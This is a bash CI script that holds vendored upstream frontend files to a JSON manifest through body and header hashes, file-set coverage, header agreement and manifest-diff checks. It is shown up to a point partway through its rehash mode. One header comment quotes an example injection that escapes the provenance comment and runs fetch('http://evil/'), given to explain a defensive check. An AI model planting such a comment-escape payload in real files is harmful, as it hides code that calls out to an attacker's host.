#!/usr/bin/env bash
# check-vendor-provenance.sh — hold the vendored upstream tree to its manifest.
#
# What this guards (tether#171). web/src/vendor/cloudcli/ carries files copied
# byte-for-byte out of siteboon/claudecodeui at a pinned tag. The whole point of
# copying them that way is that six months from now
#
#     git diff <pinned-sha>..<newer-sha> -- <upstream-path>
#
# still applies to our copy. That property survives exactly as long as nobody
# edits those files in place, and "nobody edits them" is not something a comment
# can enforce — comments rot, and a README line saying "based on v1.37.2" rots
# fastest of all because nothing reads it.
#
# ── the shape this check deliberately is NOT ────────────────────────────────
# The obvious way to write this is: loop over the manifest, and for each entry
# check the entry. That check passes forever while being blind, because the set
# it iterates is a hand-maintained list — a file that was never added to the
# manifest is a file the loop never visits.
#
# web/ already shipped one gate with exactly that defect. `wire-contract.spec.ts`
# has a test named "exposes exactly the 8 ErrorCode constants" which builds its
# expectation from the same eight names it then asserts, so the module's actual
# ten exports went unnoticed and an eleventh would too (WIRE-8 in the UI
# invariants writeup). The lesson written down there is the rule this file is
# built on: *a gate's assertion has to be derived from the object under test,
# not from a copy of it.*
#
# So the manifest is never the source of the file set. `check` derives the file
# set from the filesystem — `find` over the vendor root, unioned with the git
# index — and requires the two to agree in BOTH directions: an undeclared file is
# as red as a missing one. Every hash is recomputed from bytes on disk; none is
# copied from anywhere.
#
# ── the five things `check` asserts ─────────────────────────────────────────
#   A  drift     every declared file's content hashes to the declared hash
#   B  coverage  the set of files under the vendor root == the declared set
#   C  agreement each file's own header agrees with its manifest row
#   D  non-empty the manifest declares something, and the tree contains something
#   E  header    the header region is a single inert block comment, and hashes to
#                the declared header_sha256
#
# C is not redundant with A. Without it the header and the manifest are two
# independent copies of the same claim with nothing tying them together, which
# is the failure mode this whole exercise exists to avoid — one of them would
# quietly become wrong and the other would keep the build green.
#
# D is not paranoia either: with an empty manifest and an empty tree, A, B and C
# are all vacuously true. An empty set is the cheapest false gate there is.
#
# E exists because A covers only the bytes BELOW the terminator. The first
# version of this script parsed six fields out of the region above it and left
# every other byte of that region unexamined — nothing required those lines to be
# comment continuations at all. Measured on that version: a payload that closes
# the comment early, runs, and reopens it
#
#     /* @tether-vendored - DO NOT EDIT THIS FILE.
#      * upstream-path: tailwind.config.js
#      ... */ globalThis.x = fetch('http://evil/'); /*
#      * @tether-vendored-end */
#
# passed `check` AND `verify-upstream`, the latter printing "byte-identical to
# the upstream blobs they name" — which was then an actively false statement,
# because the file upstream published contained no such code. A trusted region
# that nothing reads is not provenance; it is an unhashed hole in the middle of a
# file whose whole purpose is being hashed. So E asserts two things:
#
#   shape  line 1 is exactly HEADER_LINE1, the terminator is exactly HEADER_END,
#          every line between them opens ' * ', and no line before the terminator
#          contains '*/'. A region shaped like that cannot escape the comment, so
#          it cannot execute, in JS or CSS.
#   hash   header_sha256 over lines 1..terminator. Shape alone would still let the
#          prose and the `license` / `license-text` lines be rewritten silently —
#          fields that C does not read. With the hash, no byte of the region can
#          move without a matching manifest edit showing up in the PR diff.
#
# ── modes ───────────────────────────────────────────────────────────────────
#   check                    (default) offline. This is the CI gate.
#   check-diff <base> [head] offline. Reads the *change* between two manifests
#                            rather than the state of one, which is what catches
#                            a content hash that moved with no pin behind it.
#                            Runs per-PR in CI against the PR base.
#   rehash                   recompute content hashes into the manifest. Used in
#                            step 4 of an absorption. Exits non-zero if it
#                            changed anything, so it cannot be chained ahead of
#                            `check` and quietly launder an edit.
#   verify-upstream <clone>  needs a clone of the upstream repo. Proves the
#                            recorded hashes are what upstream actually shipped
#                            at the recorded SHA — the one assertion no offline
#                            mode can make. Step 5 of an absorption.
#
# `check` is the per-PR gate because it is offline and deterministic;
# verify-upstream reaches github.com, and a gate that goes red when a third party
# has a bad afternoon is a gate people learn to rerun past.
#
# The residual `check` cannot see, because it compares state and an edit plus a
# `rehash` leaves consistent state: an in-place edit, rehashed, is green. That
# used to be handled by a sentence in docs/vendoring-cloudcli.md asking for
# verify-upstream output on any PR touching a hash — i.e. by asking people. It is
# now `check-diff`, which is offline and deterministic like `check` and therefore
# runs on every PR: a *_sha256 that moves while the entry's tag, sha and status
# stay put is exactly the signature of an in-place edit, and reading the diff
# rather than the state is what makes it visible.
set -euo pipefail
cd "$(dirname "$0")/.."

MANIFEST=web/src/vendor/cloudcli.MANIFEST.json

# The header block must open on line 1 and close within this many lines. Bounded
# on purpose: an unbounded search would happily accept a terminator that appears
# somewhere down in the file's content and treat everything above it as header.
HEADER_MAX_LINES=40
HEADER_OPEN='/* @tether-vendored'
HEADER_LINE1='/* @tether-vendored - DO NOT EDIT THIS FILE.'
HEADER_END=' * @tether-vendored-end */'
HEADER_CONT=' * '

# Layers a `vendored` entry may declare. A policy list — the set of layers the UI
# rewrite is organised into — not an inventory of files, so it is not the WIRE-8
# shape. Present so that `layer` is a checked field rather than a write-only one:
# a field nothing reads is decoration, and decoration is what rots.
LAYERS_ALLOWED=(1-design-tokens 2-primitives)

# Only these paths (relative to the vendor root) may be declared `verbatim`,
# i.e. carried with no provenance header. A header is text inserted into the
# file, and inserting text into a license document is not a thing to do.
#
# This is a policy list — a rule about what is *allowed* — not an inventory of
# what exists, so it is not the WIRE-8 shape: the inventory still comes from the
# filesystem in check B. Full paths rather than basenames, so a source file
# cannot dodge the header requirement by being named LICENSE in a subdirectory.
VERBATIM_ALLOWED_PATHS=(LICENSE NOTICE COPYING)

fail=0
red() { echo "FAIL: $*" >&2; fail=1; }

need() { command -v "$1" >/dev/null 2>&1 || { echo "missing required tool: $1" >&2; exit 2; }; }
need jq
need sha256sum
need git

[[ -f "$MANIFEST" ]] || { echo "manifest not found: $MANIFEST" >&2; exit 2; }
jq empty "$MANIFEST" 2>/dev/null || { echo "manifest is not valid JSON: $MANIFEST" >&2; exit 2; }

VENDOR_ROOT=$(jq -r '.vendor_root' "$MANIFEST")
[[ -n "$VENDOR_ROOT" && "$VENDOR_ROOT" != "null" ]] || { echo "manifest has no vendor_root" >&2; exit 2; }
# A trailing slash would survive every other check and then silently break the
# prefix strip in check B ("web/src/vendor/cloudcli//x" minus "web/src/vendor/
# cloudcli//" is not a match), reporting every file as undeclared. Refuse it here
# rather than emitting that pile of nonsense.
case "$VENDOR_ROOT" in
	*/) echo "vendor_root must not end in '/': '$VENDOR_ROOT'" >&2; exit 2 ;;
	/*|*..*) echo "vendor_root must be repo-relative and free of '..': '$VENDOR_ROOT'" >&2; exit 2 ;;
esac
[[ -d "$VENDOR_ROOT" ]] || { echo "vendor_root is not a directory: $VENDOR_ROOT" >&2; exit 2; }

# ── helpers ─────────────────────────────────────────────────────────────────

# Line number of the header terminator, or empty if there is none in range.
#
# Deliberately pure bash rather than `head | grep -m1`: under `set -o pipefail`
# an early-exiting reader can leave the writer with SIGPIPE, so such a pipeline
# reports failure on exactly the runs where it found what it was looking for.
# That turns "header found" into "no header" — a wrong answer, not a crash.
header_end_line() {
	local f=$1 i=0 line
	while IFS= read -r line || [[ -n "$line" ]]; do
		i=$(( i + 1 ))
		(( i > HEADER_MAX_LINES )) && break
		if [[ "$line" == "$HEADER_END" ]]; then printf '%s' "$i"; return 0; fi
	done <"$f"
	return 0
}

# Value of one ` * name: value` field from inside the header block. Bounded by
# the terminator line, so a line further down the file that happens to look like
# a field cannot answer for it. First occurrence wins.
header_field() {
	local f=$1 name=$2 end=$3 i=0 line
	# Separate statement, not another `name=value` on the `local` above: bash
	# expands every word of a command before running it, so a later assignment
	# in the same `local` sees the *outer* scope's value — unset here, which
	# under `set -u` aborts the script.
	local prefix=" * ${name}: "
	while IFS= read -r line || [[ -n "$line" ]]; do
		i=$(( i + 1 ))
		(( i > end )) && break
		if [[ "$line" == "$prefix"* ]]; then printf '%s' "${line#"$prefix"}"; return 0; fi
	done <"$f"
	return 0
}

# Prints a one-line reason if lines 1..$2 of $1 are not a single self-contained
# block comment, and nothing at all if they are. Assertion E's shape half.
#
# The point is narrow and worth stating: everything above the terminator is
# *trusted* — check A starts below it — so the only thing that makes trusting it
# safe is a proof that it cannot be anything but comment. Hence "no '*/' before
# the terminator" rather than a list of things not to write: an allow-list of
# shapes closes the whole class, a deny-list of payloads closes one payload.
header_region_violation() {
	local f=$1 end=$2 i=0 line
	while IFS= read -r line || [[ -n "$line" ]]; do
		i=$(( i + 1 ))
		(( i > end )) && break
		if (( i < end )) && [[ "$line" == *'*/'* ]]; then
			printf 'line %d closes the block comment before the terminator: %s' "$i" "$line"
			return 0
		fi
		if (( i == 1 )); then
			[[ "$line" == "$HEADER_LINE1" ]] || {
				printf 'line 1 is not exactly %s (got: %s)' "$HEADER_LINE1" "$line"; return 0; }
		elif (( i < end )); then
			# ' *' with nothing after it is a legitimate blank continuation line.
			[[ "$line" == "$HEADER_CONT"* || "$line" == ' *' ]] || {
				printf 'line %d is not a comment continuation (must open " * "): %s' "$i" "$line"; return 0; }
		fi
	done <"$f"
	(( i >= end )) || printf 'file has %d lines but the terminator was reported at %d' "$i" "$end"
	return 0
}

sha_of_file() { sha256sum "$1" | cut -d' ' -f1; }
sha_of_body() { tail -n +"$(( $2 + 1 ))" "$1" | sha256sum | cut -d' ' -f1; }
# Lines 1..$2 inclusive — the provenance header this repo prepends, i.e. exactly
# the bytes sha_of_body excludes. Between them the two hashes cover every byte of
# the file, with the split at the one place a split is meaningful: upstream's
# bytes on one side, ours on the other.
sha_of_header() { head -n "$2" "$1" | sha256sum | cut -d' ' -f1; }

# Every declared path, both arrays, one per line. Used for the manifest side of
# check B and for input validation.
declared_paths() { jq -r '(.vendored + .verbatim)[].path' "$MANIFEST"; }

# ── shared validation (runs in every mode) ──────────────────────────────────

for arr in vendored verbatim rejected_upstream_changes; do
	jq -e --arg a "$arr" 'has($a) and (.[$a] | type == "array")' "$MANIFEST" >/dev/null \
		|| { echo "manifest is missing the '$arr' array" >&2; exit 2; }
done

# Every row below is carried out of jq as @tsv and read back with IFS=$'\t', and
# check B compares path sets as sorted lines. `jq`'s @tsv escapes tabs and
# newlines rather than emitting them, so a path containing either arrives here
# as the two-character `\t` / `\n` and can never match a real file — a closed
# failure, but a mystifying one. Reject it up front and say why. (Newlines get
# the same treatment on the filesystem side, in check B.)
while IFS= read -r p; do
	case "$p" in
		/*|*..*|"") echo "manifest path must be relative and free of '..': '$p'" >&2; exit 2 ;;
		*$'\t'*)    echo "manifest path contains a tab: '$p'" >&2; exit 2 ;;
	esac
done < <(declared_paths)

dupes=$(declared_paths | sort | uniq -d)
[[ -z "$dupes" ]] || { echo "manifest declares the same path twice:" >&2; sed 's/^/  /' <<<"$dupes" >&2; exit 2; }

MODE=${1:-check}

# ═══════════════════════════════════════════════════════════════════════════
case "$MODE" in

check)
	# ── D: non-vacuity ──────────────────────────────────────────────────────
	# Asserted first and hard, because every other check below is trivially
	# satisfiable by an empty set and would report a confident green.
	n_declared=$(declared_paths | wc -l)
	n_vendored=$(jq -r '.vendored | length' "$MANIFEST")
	if (( n_declared == 0 )); then
		red "the manifest declares no files at all. Every other assertion in this"
		echo "      script is vacuously true against an empty set, so an empty manifest" >&2
		echo "      is not 'nothing to check', it is a check that cannot fail." >&2
	fi
	if (( n_vendored == 0 )); then
		red "the manifest declares no 'vendored' (header-carrying) files. If the"
		echo "      vendored tree really has been emptied, delete this gate in the same" >&2
		echo "      commit rather than leaving a green one behind." >&2
	fi

	# ── B: coverage — file set derived from the tree, not from the manifest ─
	# The union of two enumerations, because neither alone is the set we mean:
	#
	#   find              everything actually on disk. Catches a file written but
	#                     not yet staged, which is exactly when a local run earns
	#                     its keep.
	#   git ls-files      the index. Catches a file that is staged but has since
	#                     been removed from the worktree.
	#
	# `find` and not `git ls-files --others --exclude-standard`, which was the
	# first version of this line. That form silently honours .gitignore, which
	# makes .gitignore an implicit exclusion list for this gate — and tether's
	# .gitignore has un-anchored entries (`.env`, `*.out`, `.DS_Store`). Measured
	# on the first version: `echo SECRET=1 > $VENDOR_ROOT/.env` and the check
	# still reported OK. An exclusion list nobody declared is worse than one
	# somebody did, so there is now none at all: every path under the vendor root
	# must be declared, full stop.
	#
	# -type l as well as -type f so a symlink is seen and reported rather than
	# silently followed or skipped. core.quotePath=false and -z/-print0 because
	# git C-quotes non-ASCII paths by default ("src/\345\220\215.js"), which both
	# corrupts the name and defeats the prefix strip.
	found_list=()
	while IFS= read -r -d '' p; do
		# A newline in a filename would split one path into two list entries and
		# produce a pair of baffling errors instead of one clear one. It cannot
		# reach the manifest (asserted above), so say so plainly here.
		case "$p" in *$'\n'*)
			echo "path under '$VENDOR_ROOT' contains a newline; refusing to guess: $(printf '%q' "$p")" >&2
			exit 2 ;;
		esac
		found_list+=("${p#"$VENDOR_ROOT/"}")
	done < <(
		git -c core.quotePath=false ls-files --cached -z -- "$VENDOR_ROOT"
		find "$VENDOR_ROOT" -mindepth 1 \( -type f -o -type l \) -print0
	)

	if (( ${#found_list[@]} == 0 )); then
		found=""
		red "no files found under '$VENDOR_ROOT' — the vendor tree is empty."
	else
		found=$(printf '%s\n' "${found_list[@]}" | sort -u)
	fi
	declared=$(declared_paths | sort -u)

	undeclared=$(comm -23 <(printf '%s\n' "$found") <(printf '%s\n' "$declared") | grep -v '^$' || true)
	missing=$(comm -13 <(printf '%s\n' "$found") <(printf '%s\n' "$declared") | grep -v '^$' || true)

	if [[ -n "$undeclared" ]]; then
		red "files under '$VENDOR_ROOT' that the manifest does not declare:"
		sed 's/^/  /' <<<"$undeclared" >&2
		echo "      Nothing records where these came from, so nothing can ever diff them" >&2
		echo "      against a newer upstream tag. Declare them in $MANIFEST" >&2
		echo "      or move them out of the vendor root." >&2
	fi
	if [[ -n "$missing" ]]; then
		red "the manifest declares files that are not in '$VENDOR_ROOT':"
		sed 's/^/  /' <<<"$missing" >&2
	fi

	# ── pins: (tag, sha) pairs must come from one declared table ────────────
	# Entries are allowed to sit at different tags — a partial absorption is a
	# legitimate state — so this does not force them all onto the baseline. It
	# does force each one's SHA to be the SHA this repo has recorded for that
	# tag, which is what catches a typo or two SHAs claiming to be one tag.
	baseline=$(jq -r '.current_baseline' "$MANIFEST")
	jq -e --arg b "$baseline" '.pins | has($b)' "$MANIFEST" >/dev/null \
		|| red "current_baseline '$baseline' is not a key in .pins"

	while IFS=$'\t' read -r path tag sha; do
		pinned=$(jq -r --arg t "$tag" '.pins[$t] // ""' "$MANIFEST")
		if [[ -z "$pinned" ]]; then
			red "$path declares tag '$tag', which is not in .pins"
		elif [[ "$pinned" != "$sha" ]]; then
			red "$path declares tag '$tag' at sha '$sha', but .pins says '$pinned'"
		fi
	done < <(jq -r '(.vendored + .verbatim)[] | [.path, .tag, .sha] | @tsv' "$MANIFEST")

	# ── A + C + E: vendored files (header-carrying) ─────────────────────────
	# upstream-repo is a single top-level fact, not per-entry, so it comes from
	# .upstream.repo — but each file still has to agree with it.
	up_repo=$(jq -r '.upstream.repo' "$MANIFEST")
	while IFS=$'\t' read -r path up_path tag sha fetched status declared_hash declared_header_hash layer; do
		f="$VENDOR_ROOT/$path"
		[[ -f "$f" ]] || { red "declared vendored file is missing: $f"; continue; }

		# `read` and not `head -1 | grep`, for the SIGPIPE reason in
		# header_end_line above.
		line1=""; IFS= read -r line1 <"$f" || true
		if [[ "$line1" != "$HEADER_OPEN"* ]]; then
			red "$f does not open with a provenance header ('$HEADER_OPEN' on line 1)"
			continue
		fi
		end=$(header_end_line "$f")
		if [[ -z "$end" ]]; then
			red "$f has no '$HEADER_END' terminator in its first $HEADER_MAX_LINES lines."
			echo "      Without it there is no way to tell the local header from upstream's" >&2
			echo "      bytes, so the pristine claim cannot be checked at all." >&2
			continue
		fi

		# E — the header region is an inert block comment, and every byte of it
		# is accounted for. Both halves run before C and A: if the region is not
		# provably comment, no amount of field agreement below makes the file
		# safe, and reporting "header 'fetched' is ..." about a file that is
		# executing code would bury the finding that matters.
		why=$(header_region_violation "$f" "$end")
		if [[ -n "$why" ]]; then
			red "$f: the provenance header region (lines 1..$end) is not a single block comment."
			echo "        $why" >&2
			echo "      Everything above the terminator is trusted — body_sha256 starts below" >&2
			echo "      it — so it has to be provably inert. A line that closes the comment" >&2
			echo "      early puts live code into a file this repo claims is upstream's, and" >&2
			echo "      then verify-upstream's 'byte-identical' output is a false statement." >&2
			continue
		fi
		if [[ -z "$declared_header_hash" ]]; then
			red "$path has no header_sha256 in the manifest. The header region is trusted;"
			echo "      an unhashed trusted region is the hole assertion E exists to close." >&2
		else
			actual_header=$(sha_of_header "$f" "$end")
			[[ "$actual_header" == "$declared_header_hash" ]] || {
				red "$f's provenance header does not match its declared header_sha256."
				echo "        declared header_sha256: $declared_header_hash" >&2
				echo "        actual   header_sha256: $actual_header" >&2
				echo "      Some byte of lines 1..$end changed. If that was deliberate (an" >&2
				echo "      absorption moves tag/sha/fetched), rerun rehash; the manifest diff" >&2
				echo "      is then the record of it." >&2
			}
		fi

		ok_layer=0
		for l in "${LAYERS_ALLOWED[@]}"; do
			if [[ "$layer" == "$l" ]]; then ok_layer=1; fi
		done
		(( ok_layer )) || red "$path declares layer '$layer'; expected one of: ${LAYERS_ALLOWED[*]}"

		# C — the file's own header against the manifest row.
		#
		# Every field the header states as fact is compared. An earlier version
		# checked only four of them, which left `fetched` and `upstream-repo`
		# free to say anything at all — and `fetched` is one of the four things
		# the per-file provenance convention exists to record. A field that is
		# written but never read is not provenance, it is decoration: measured on
		# that version, rewriting `fetched` to 1999-01-01 and `upstream-repo` to
		# a different project both passed green.
		#
		# The header's `license` and `license-text` lines are not in this list and
		# do not need to be: they have no manifest counterpart to agree with, and
		# E's header_sha256 already covers every byte of the region, so neither can
		# change without the manifest changing with it. That is the general answer
		# to "field written but never read" here — E reads all of them.
		for pair in "upstream-repo:$up_repo" "upstream-path:$up_path" "upstream-tag:$tag" \
		            "upstream-sha:$sha" "fetched:$fetched" "status:$status"; do
			field=${pair%%:*}; want=${pair#*:}
			got=$(header_field "$f" "$field" "$end")
			[[ "$got" == "$want" ]] || red "$f header '$field' is '$got', manifest says '$want'"
		done

		# A — bytes below the terminator against the declared hash.
		actual=$(sha_of_body "$f" "$end")
		if [[ "$actual" != "$declared_hash" ]]; then
			red "$f has been modified below its provenance header."
			echo "        declared body_sha256: $declared_hash" >&2
			echo "        actual   body_sha256: $actual" >&2
			echo "      Vendored files are kept byte-identical to upstream so that a diff" >&2
			echo "      between two upstream tags still applies to them. Revert this edit" >&2
			echo "      and put the change in web/src/ui/ instead; if the file genuinely" >&2
			echo "      has to fork, follow step 6 in docs/vendoring-cloudcli.md." >&2
		fi

		case "$status" in
			pristine) ;;
			detached)
				for req in detached_from_sha detached_reason; do
					v=$(jq -r --arg p "$path" --arg k "$req" '.vendored[] | select(.path == $p) | .[$k] // ""' "$MANIFEST")
					[[ -n "$v" ]] || red "$path is 'detached' but has no $req"
				done ;;
			*) red "$path has unknown status '$status' (expected pristine or detached)" ;;
		esac
	done < <(jq -r '.vendored[] | [.path, .upstream_path, .tag, .sha, .fetched, .status,
	                              .body_sha256, (.header_sha256 // ""), (.layer // "")] | @tsv' "$MANIFEST")

	# ── A: verbatim files (no header, whole file hashed) ────────────────────
	while IFS=$'\t' read -r path status declared_hash reason; do
		f="$VENDOR_ROOT/$path"
		[[ -f "$f" ]] || { red "declared verbatim file is missing: $f"; continue; }

		# Whole relative path, not basename: matching on basename would let
		# `src/shared/view/ui/LICENSE` — or any source file renamed to LICENSE in
		# a subdirectory — carry no header at all. These three live at the root of
		# a vendor tree or nowhere.
		ok=0
		for a in "${VERBATIM_ALLOWED_PATHS[@]}"; do
			if [[ "$path" == "$a" ]]; then ok=1; fi
		done
		if (( ! ok )); then
			red "$path is declared 'verbatim' (no provenance header), which is only"
			echo "      allowed for: ${VERBATIM_ALLOWED_PATHS[*]}. Everything else must carry" >&2
			echo "      a header; 'verbatim' is not a way to opt a source file out of one." >&2
		fi
		[[ -n "$reason" && "$reason" != "null" ]] || red "$path is 'verbatim' but has no no_header_reason"
		[[ "$status" == "pristine" ]] || red "$path is verbatim with status '$status'; verbatim files are pristine by definition"

		actual=$(sha_of_file "$f")
		[[ "$actual" == "$declared_hash" ]] || {
			red "$f differs from its declared content."
			echo "        declared file_sha256: $declared_hash" >&2
			echo "        actual   file_sha256: $actual" >&2
		}
	done < <(jq -r '.verbatim[] | [.path, .status, .file_sha256, (.no_header_reason // "")] | @tsv' "$MANIFEST")

	# ── rejected-change log: shape only, but it must not be droppable ───────
	# reviewed_on is required, not optional. A rejection whose date is unknown
	# cannot be aged out, and "we looked at this once" is worth much less at the
	# next absorption than "we looked at this on 2026-09-14, at tag v1.38.0".
	# The documented example in docs/vendoring-cloudcli.md has always carried it;
	# only the check did not, which is how the two drift apart.
	while IFS=$'\t' read -r tag up_path reason reviewed_on; do
		[[ -n "$tag" && -n "$up_path" && -n "$reason" && -n "$reviewed_on" ]] \
			|| red "an entry in rejected_upstream_changes is missing tag/upstream_path/reason/reviewed_on"
	done < <(jq -r '.rejected_upstream_changes[]
	               | [(.tag // ""), (.upstream_path // ""), (.reason // ""), (.reviewed_on // "")] | @tsv' "$MANIFEST")

	if (( fail )); then
		echo >&2
		echo "Vendored provenance is broken. See docs/vendoring-cloudcli.md." >&2
		exit 1
	fi
	n_detached=$(jq -r '[.vendored[] | select(.status == "detached")] | length' "$MANIFEST")
	echo "OK: all $n_declared file(s) under $VENDOR_ROOT match $MANIFEST"
	echo "    (${n_vendored} with provenance headers, $(( n_declared - n_vendored )) verbatim;" \
	     "${n_detached} detached; baseline ${baseline})"
	;;

check-diff)
	# ── reads the change, not the state ─────────────────────────────────────
	# `check` compares the tree against the manifest. Both sides of that
	# comparison live in the same commit and both are writable, so an in-place
	# edit followed by `rehash` leaves perfectly consistent state and `check` is
	# green on it. No state comparison can close that: after the rehash there is
	# nothing inconsistent left to find. The gate has to read the *change*.
	#
	# And the change is decidable offline. A content hash is a function of
	# upstream's bytes at a pin, and upstream's bytes at a fixed pin do not
	# change. So
	#
	#     a *_sha256 moved  +  that entry's tag / sha / status did not
	#
	# is not a heuristic for an in-place edit, it is the definition of one. The
	# same argument makes `.pins` append-only: a pin is a record of what upstream
	# published at a tag, so a pin whose value changes is a rewritten record.
	#
	# This is the mechanism that replaces "any PR whose diff touches a *_sha256
	# must carry verify-upstream output" — a sentence in a document, addressed to
	# people, enforced by nobody. It is offline and deterministic, so the reason
	# verify-upstream is not a per-PR gate (it reaches github.com and goes red on
	# someone else's bad afternoon) does not apply here, and it runs on every PR.
	#
	# It deliberately does NOT re-verify hashes against files — `check` does that
	# and CI runs both. Manifests in, verdict out, which is also what lets it be
	# pointed at two files rather than two refs.
	base_loc=${2:-}
	head_loc=${3:-$MANIFEST}
	if [[ -z "$base_loc" ]]; then
		echo "usage: $0 check-diff <base> [head]" >&2
		echo "  <base>, [head]  '@<git-ref>' reads $MANIFEST as of that ref;" >&2
		echo "                  anything else is a path to a manifest file." >&2
		echo "                  [head] defaults to the one in the worktree." >&2
		echo "  in CI:          $0 check-diff @\$PR_BASE_SHA" >&2
		exit 2
	fi

	base_json=$(mktemp); head_json=$(mktemp)
	trap 'rm -f "$base_json" "$head_json"' EXIT

	load_manifest() { # <locator> <outfile>; returns 1 if there is no manifest there
		local loc=$1 out=$2
		case "$loc" in
			@*) git show "${loc#@}:$MANIFEST" >"$out" 2>/dev/null || return 1 ;;
			*)  [[ -f "$loc" ]] || return 1
			    cat "$loc" >"$out" ;;
		esac
		jq empty "$out" 2>/dev/null || { echo "not valid JSON: $loc" >&2; exit 2; }
	}

	load_manifest "$head_loc" "$head_json" || { echo "no manifest at '$head_loc'" >&2; exit 2; }
	if ! load_manifest "$base_loc" "$base_json"; then
		# The commit that introduces the vendor tree has no base manifest to
		# compare against, and a new entry's hash is a new fact, not a moved one.
		# Green — but say why, so a green here is not mistaken for a comparison
		# that happened.
		echo "OK: '$base_loc' carries no $MANIFEST, so there is no prior record to"
		echo "    compare against — every entry at '$head_loc' is new. Nothing here"
		echo "    can be a laundered hash; a new hash is what 'check' (against the"
		echo "    files) and verify-upstream (against upstream) are for."
		exit 0
	fi

	# Two streams. `fail` is a change that cannot have come from upstream. `note`
	# is a change that is legitimate but is exactly the kind of thing a reviewer
	# should not have to go looking for — a file leaving the absorption chain is
	# one manifest line, and after it lands nothing claims byte-identity with
	# upstream any more. Printing it is not a gate and is not pretending to be
	# one; it is refusing to be silent about it.
	while IFS=$'\t' read -r sev code where detail; do
		[[ -n "$code" ]] || continue
		if [[ "$sev" == fail ]]; then
			red "[$code] $where"
			echo "      $detail" >&2
		else
			echo "NOTE: [$code] $where"
			echo "      $detail"
		fi
	done < <(jq -r --slurpfile b "$base_json" '
		def entries:
		    [ ((.vendored // [])[] | {path, tag, sha, status,
		                              hash: (.body_sha256 // ""), df: (.detached_from_sha // "")}) ]
		  + [ ((.verbatim // [])[] | {path, tag, sha, status,
		                              hash: (.file_sha256 // ""), df: ""}) ];
		($b[0] | entries) as $be
		| entries as $he
		| ($b[0].pins // {}) as $bp
		| (.pins // {}) as $hp
		| [ ($bp | to_entries[] | select($hp[.key] != .value)
		      | ["fail", "pin-rewritten", (".pins[\"" + .key + "\"]"),
		         ("was " + .value + ", now " + (($hp[.key] // "<removed>") | tostring)
		          + ". A pin records what upstream published at a tag. That is history;"
		          + " history is appended to, not corrected in place.")]) ]
		+ [ $he[] as $h
		    | ($be[] | select(.path == $h.path)) as $bb
		    | if $h.hash != $bb.hash and $h.tag == $bb.tag
		         and $h.sha == $bb.sha and $h.status == $bb.status then
		        ["fail", "hash-moved-alone", $h.path,
		         ("content hash moved " + $bb.hash[0:12] + " -> " + $h.hash[0:12]
		          + " while tag (" + $h.tag + "), sha and status all stayed put."
		          + " Upstream cannot have changed its bytes at a fixed sha, so this is"
		          + " an in-place edit that was rehashed. Absorb a tag (move tag+sha) or"
		          + " detach the file deliberately (step 6); do not move the hash alone.")]
		      elif $bb.status == "pristine" and $h.status == "detached" and $h.df != $bb.sha then
		        ["fail", "detach-from-elsewhere", $h.path,
		         ("newly detached, but detached_from_sha is "
		          + (if $h.df == "" then "<empty>" else $h.df end)
		          + " while this entry was pinned at " + $bb.sha
		          + ". A fork forks from where the file actually was.")]
		      elif $bb.status == "detached" and $h.status == "pristine" and $h.hash == $bb.hash then
		        ["fail", "reattach-without-change", $h.path,
		         ("status went detached -> pristine while the content stayed byte-identical"
		          + " to the forked copy. Either it was restored to upstream (then the hash"
		          + " moves) or it is still forked (then it is not pristine).")]
		      elif $bb.status == "pristine" and $h.status == "detached" then
		        ["note", "newly-detached", $h.path,
		         ("leaves the absorption chain in this diff (forked from " + $h.df[0:7]
		          + "). From here on, upstream fixes to this file have to be ported by hand"
		          + " and nothing claims it is byte-identical to upstream any more. That is"
		          + " a real decision and it is one manifest line wide; read the reason.")]
		      else empty end ]
		+ [ $he[] as $h | select([$be[].path] | index($h.path) | not)
		    | ["note", "entry-added", $h.path,
		       ("newly declared, at " + $h.tag + " / " + $h.sha[0:7]
		        + ". A new hash is a new fact, not a moved one — what backs it is"
		        + " verify-upstream against a clone, which this mode cannot do.")] ]
		+ [ $be[] as $o | select([$he[].path] | index($o.path) | not)
		    | ["note", "entry-removed", $o.path,
		       ("no longer declared. Confirm the file is gone from the vendor root too"
		        + " (check asserts that) and that dropping it was the intent.")] ]
		| .[] | @tsv' "$head_json")

	n_cmp=$(jq -r '((.vendored // []) + (.verbatim // [])) | length' "$head_json")
	n_base=$(jq -r '((.vendored // []) + (.verbatim // [])) | length' "$base_json")
	if (( fail )); then
		echo >&2
		echo "The manifest diff from '$base_loc' to '$head_loc' contains a change that" >&2
		echo "cannot have come from upstream. See step 4 of docs/vendoring-cloudcli.md." >&2
		exit 1
	fi
	echo "OK: manifest diff '$base_loc' -> '$head_loc' declares no content hash that"
	echo "    moved without its pin ($n_base entr(ies) before, $n_cmp after)"
	;;

rehash)
	# Recomputes content hashes only. tag / sha / upstream_path / status stay
	# human-authored: this is a calculator for step 4 of an absorption, not a
	# "make it green" button.
	#
	# It exits non-zero whenever it changes something, which stops `rehash &&
	# check` from reporting a clean pass. Be clear about the limit of that: the
	# manifest is already written by then, so `rehash ; check` — semicolon, or
	# two separate commands — does go green on an in-place edit. This mode cannot
	# close that. `check-diff` is what closes it offline (the hash moved, the pin
	# did not), and `verify-upstream` is what closes it against upstream itself.
	#
	# What it will not do is bless a header it cannot vouch for: a file whose
	# header region is not a self-contained block comment is refused outright,
	# hard, rather than skipped. Skipping would make "inject, then rehash" a way
	# to get a matching header_sha256 written for a payload.
	tmp=$(mktemp); trap 'rm -f "$tmp"' EXIT
	cp "$MANIFEST" "$tmp"
	changed=0

	while IFS=$'\t' read -r path old old_header; do
		f="$VENDOR_ROOT/$path"
		[[ -f "$f" ]] || { echo "skip (missing): $f" >&2; continue; }
		end=$(header_end_line "$f")
		[[ -n "$end" ]] || { echo "skip (no header terminator): $f" >&2; continue; }
		why=$(header_region_violation "$f" "$end")
		[[ -z "$why" ]] || {
			echo "refusing to rehash $f: header region is not a single block comment" >&2
			echo "  $why" >&2
			exit 2; }
		new=$(sha_of_body "$f" "$end")
		if [[ "$new" != "$old" ]]; then
			echo "body_sha256 $path"; echo "  - $old"; echo "  + $new"
			changed=1
			jq --arg p "$path" --arg h "$new" \
				'.vendored |= map(if .path == $p then .body_sha256 = $h else . end)' "$tmp" >"$tmp.n" && mv "$tmp.n" "$tmp"
		fi
		new_header=$(sha_of_header "$f" "$end")
		if [[ "$new_header" != "$old_header" ]]; then
			echo "header_sha256 $path"; echo "  - $old_header"; echo "  + $new_header"
			changed=1
			jq --arg p "$path" --arg h "$new_header" \
				'.vendored |= map(if .path == $p then .header_sha256 = $h else . end)' "$tmp" >"$tmp.n" && mv "$tmp.n" "$tmp"
		fi
